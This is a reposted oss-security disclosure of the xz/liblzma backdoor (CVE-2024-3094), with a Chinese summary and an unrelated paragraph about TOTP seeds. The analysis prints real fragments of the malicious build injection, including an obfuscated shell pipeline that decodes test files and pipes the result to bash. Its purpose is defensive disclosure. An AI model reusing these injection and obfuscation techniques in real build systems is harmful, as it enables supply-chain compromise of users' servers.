上游 xz/liblzma 中的后门导致 SSH 服务器受损

上游 xz/liblzma 中的后门导致 SSH 服务器受损
Backdoor in upstream xz/liblzma leading to SSH server compromise

原始链接: https://www.openwall.com/lists/oss-security/2024/03/29/4

标题：后门 liblzma 导致 SSH 服务器妥协：100 字摘要 2024 年 3 月，Andres Freund 在 xz 实用程序的 liblzma 组件的上游版本中发现了一个后门。该后门会影响 Linux 发行版，特别是那些依赖于 SSH 服务器构建期间受损版本的 liblzma 的发行版。在发现异常的 CPU 使用率和 Valgrind 错误后，Freund 确定原因是损坏的 liblzma tarball 和 GitHub 版本中的 Makefile 被修改。注入的恶意脚本一旦在构建时执行，就会在动态链接器中安装审核挂钩以拦截函数调用并将其重定向到攻击者的代码。因此，在 SSH 密钥身份验证过程中，后门会调用受感染的 liblzma 库，从而允许潜在的未经授权的访问或远程代码执行。该漏洞现称为 CVE-2024-3094，可能会给受影响的系统带来严重的安全后果。强烈建议用户及时更新其软件。

用户知道 Google 身份验证器并不是必需的，因为它能够从初始设置中恢复基于时间的一次性密码 (TOTP) 种子。这意味着 TOTP 的功能类似于常规密码，用户通常会保留多个备份。用户可以记住初始二维码扫描期间生成的原始号码，并使用它在各种应用程序和设备上设置相同的 TOTP。尽管Google Authenticator可能不提供直接手动导出功能，但用户可以手动写下或以数字方式保存这些种子。在紧急情况下，用户在最初激活双因素身份验证时会获得 10 或 12 个一次性恢复代码。通过烧录恢复代码，即可访问该帐户，从而允许用户获取新的种子值并继续使用 TOTP 保护。但是，出于安全目的，建议不要在一个位置同时使用密码和 TOTP 种子。用户批评网站对 TOTP 概念解释不力，强调了解 TOTP 种子的性质并安全保存它们的重要性。

oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise [<prev] [next>] [thread-next>] [day] [month] [year] [list]

Date: Fri, 29 Mar 2024 08:51:26 -0700
From: Andres Freund <[email protected]>
To: [email protected]
Subject: backdoor in upstream xz/liblzma leading to ssh server compromise

Hi,

After observing a few odd symptoms around liblzma (part of the xz package) on
Debian sid installations over the last weeks (logins with ssh taking a lot of
CPU, valgrind errors) I figured out the answer:

The upstream xz repository and the xz tarballs have been backdoored.

At first I thought this was a compromise of debian's package, but it turns out
to be upstream.

== Compromised Release Tarball ==

One portion of the backdoor is *solely in the distributed tarballs*. For
easier reference, here's a link to debian's import of the tarball, but it is
also present in the tarballs for 5.6.0 and 5.6.1:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

That line is *not* in the upstream source of build-to-host, nor is
build-to-host used by xz in git.  However, it is present in the tarballs
released upstream, except for the "source code" links, which I think github
generates directly from the repository contents:

https://github.com/tukaani-project/xz/releases/tag/v5.6.0
https://github.com/tukaani-project/xz/releases/tag/v5.6.1

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

This script is executed and, if some preconditions match, modifies
$builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

After de-obfuscation this leads to the attached injected.txt.

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in
  tests/files/bad-3-corrupt_lzma2.xz
  tests/files/good-large_compressed.lzma
committed upstream. They were initially added in
https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors
and crashes in some configurations, due the stack layout differing from what
the backdoor was expecting.  These issues were attempted to be worked around
in 5.6.1:

https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad
https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f
https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

For which the exploit code was then adjusted:
https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

Given the activity over several weeks, the committer is either directly
involved or there was some quite severe compromise of their
system. Unfortunately the latter looks like the less likely explanation, given
they communicated on various lists about the "fixes" mentioned above.

Florian Weimer first extracted the injected code in isolation, also attached,
liblzma_la-crc64-fast.o, I had only looked at the whole binary. Thanks!

== Affected Systems ==

The attached de-obfuscated script is invoked first after configure, where it
decides whether to modify the build process to inject the code.

These conditions include targeting only x86-64 linux:
    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

Building with gcc and the gnu linker
    if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
    exit 0
    fi
    if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
    exit 0
    fi
    LDv=$LD" -v"
    if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
    exit 0

Running as part of a debian or RPM package build:
    if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

Particularly the latter is likely aimed at making it harder to reproduce the
issue for investigators.

Due to the working of the injected code (see below), it is likely the backdoor
can only work on glibc based systems.

Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by linux
distributions, and where they have, mostly in pre-release versions.

== Observing Impact on openssh server ==

With the backdoored liblzma installed, logins via ssh become a lot slower.

time ssh [email protected]

before:
[email protected]: Permission denied (publickey).

before:
real	0m0.299s
user	0m0.202s
sys	0m0.006s

after:
[email protected]: Permission denied (publickey).

real	0m0.807s
user	0m0.202s
sys	0m0.006s

openssh does not directly use liblzma. However debian and several other
distributions patch openssh to support systemd notification, and libsystemd
does depend on lzma.

Initially starting sshd outside of systemd did not show the slowdown, despite
the backdoor briefly getting invoked. This appears to be part of some
countermeasures to make analysis harder.

Observed requirements for the exploit:
a) TERM environment variable is not set
b) argv[0] needs to be /usr/sbin/sshd
c) LD_DEBUG, LD_PROFILE are not set
d) LANG needs to be set
e) Some debugging environments, like rr, appear to be detected. Plain gdb
   appears to be detected in some situations, but not others

To reproduce outside of systemd, the server can be started with a clear
environment, setting only the required variable:

env -i LANG=en_US.UTF-8 /usr/sbin/sshd -D

In fact, openssh does not need to be started as a server to observe the
slowdown:

slow:
env -i LANG=C /usr/sbin/sshd -h

(about 0.5s on my older system)

fast:
env -i LANG=C TERM=foo /usr/sbin/sshd -h
env -i LANG=C LD_DEBUG=statistics /usr/sbin/sshd -h
...

(about 0.01s on the same system)

It's possible that argv[0] other /usr/sbin/sshd also would have effect - there
are obviously lots of servers linking to libsystemd.

== Analyzing the injected code ==

I am *not* a security researcher, nor a reverse engineer.  There's lots of
stuff I have not analyzed and most of what I observed is purely from
observation rather than exhaustively analyzing the backdoor code.

To analyze I primarily used "perf record -e intel_pt//ub" to observe where
execution diverges between the backdoor being active and not. Then also gdb,
setting breakpoints before the divergence.

The backdoor initially intercepts execution by replacing the ifunc resolvers
crc32_resolve(), crc64_resolve() with different code, which calls
_get_cpuid(), injected into the code (which previously would just be static
inline functions).  In xz 5.6.1 the backdoor was further obfuscated, removing
symbol names.

These functions get resolved during startup, because sshd is built with
-Wl,-z,now, leading to all symbols being resolved early. If started with
LD_BIND_NOT=1 the backdoor does not appear to work.

Below crc32_resolve() _get_cpuid() does not do much, it just sees that a
'completed' variable is 0 and increments it, returning the normal cpuid result
(via a new _cpuid()). It gets to be more interesting during crc64_resolve().

In the second invocation crc64_resolve() appears to find various information,
like data from the dynamic linker, program arguments and environment. Then it
perform various environment checks, including those above. There are other
checks I have not fully traced.

If the above decides to continue, the code appears to be parsing the symbol
tables in memory. This is the quite slow step that made me look into the issue.

Notably liblzma's symbols are resolved before many of the other libraries,
including the symbols in the main sshd binary.  This is important because
symbols are resolved, the GOT gets remapped read-only thanks to -Wl,-z,relro.

To be able to resolve symbols in libraries that have not yet loaded, the
backdoor installs an audit hook into the dynamic linker, which can be observed
with gdb using
  watch _rtld_global_ro._dl_naudit
It looks like the audit hook is only installed for the main binary.

That hook gets called, from _dl_audit_symbind, for numerous symbols in the
main binary. It appears to wait for "[email protected]" to be
resolved.  When called for that symbol, the backdoor changes the value of
[email protected] to point to its own code.  It does not do this via
the audit hook mechanism, but outside of it.

For reasons I do not yet understand, it does change sym.st_value *and* the
return value of from the audit hook to a different value, which leads
_dl_audit_symbind() to do nothing - why change anything at all then?

After that the audit hook is uninstalled again.

It is possible to change the got.plt contents at this stage because it has not
(and can't yet) been remapped to be read-only.

I suspect there might be further changes performed at this stage.

== Impact on sshd ==

The prior section explains that [email protected] was redirected to
point into the backdoor code. The trace I was analyzing indeed shows that
during a pubkey login the exploit code is invoked:

            sshd 1736357 [010] 714318.734008:          1  branches:uH:      5555555ded8c ssh_rsa_verify+0x49c (/usr/sbin/sshd) =>     5555555612d0 RSA_public_decrypt@...+0x0 (/usr/sbin/sshd)

The backdoor then calls back into libcrypto, presumably to perform normal authentication

            sshd 1736357 [010] 714318.734009:          1  branches:uH:      7ffff7c137cd [unknown] (/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.0) =>     7ffff792a2b0 RSA_get0_key+0x0 (/usr/lib/x86_64-linux-gnu/libcrypto.so.3)

I have not yet analyzed precisely what is being checked for in the injected
code, to allow unauthorized access. Since this is running in a
pre-authentication context, it seems likely to allow some form of access or
other form of remote code execution.

I'd upgrade any potentially vulnerable system ASAP.

== Bug reports ==

Given the apparent upstream involvement I have not reported an upstream
bug. As I initially thought it was a debian specific issue, I sent a more
preliminary report to [email protected].  Subsequently I reported the issue
to distros@. CISA was notified by a distribution.

Red Hat assigned this issue CVE-2024-3094.

== Detecting if installation is vulnerable ==

Vegard Nossum wrote a script to detect if it's likely that the ssh binary on a
system is vulnerable, attached here. Thanks!

Greetings,

Andres Freund

View attachment "injected.txt" of type "text/plain" (8236 bytes)

Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)

Download attachment "detect.sh" of type "application/x-sh" (426 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

上游 xz/liblzma 中的后门导致 SSH 服务器受损 Backdoor in upstream xz/liblzma leading to SSH server compromise

上游 xz/liblzma 中的后门导致 SSH 服务器受损
Backdoor in upstream xz/liblzma leading to SSH server compromise